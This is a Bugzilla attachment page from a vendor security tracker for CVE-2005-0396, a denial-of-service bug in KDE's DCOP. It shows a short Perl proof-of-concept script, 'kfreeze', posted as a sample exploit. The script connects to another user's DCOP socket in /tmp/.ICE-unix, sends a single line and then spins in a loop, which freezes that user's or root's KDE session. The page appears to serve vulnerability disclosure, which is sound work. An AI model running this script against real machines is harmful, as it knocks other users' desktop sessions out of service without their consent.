Bugzilla – Attachment 28734 Details for
Bug 66288
VUL-0: CVE-2005-0396: KDE DCOP DOS
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
IDP Log In
|
Forgot Password
sample "exploit"
kfreeze (text/plain), 433 bytes, created by
Sebastian Krahmer
on 2005-02-23 10:31:39 UTC
(
hide
)
Description:
sample "exploit"
Filename:
MIME Type:
Creator:
Sebastian Krahmer
Created:
2005-02-23 10:31:39 UTC
Size:
433 bytes
patch
obsolete
>#!/usr/bin/perl -W > ># Kfreeze. Freezing KDE session of any user/root. ># Usage: kfreeze /tmp/.ICE-unix/dcop{NUMBER} ># > >use IO::Socket; > >sub usage >{ > print "Usage: $0 /tmp/.ICE-unix/dcop....\n\n"; > exit; >} > >my $peername = shift or usage; >print "Using $peername ...\n"; > >$peer = new IO::Socket::UNIX( > Type => SOCK_STREAM, > Peer => $peername) or die $!; >print $peer "a\n"; > >print "KDE session should be freezed now.\n"; > >for(;;) {}; >
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
Actions:
View
Attachments on
bug 66288
: 28734 |
28736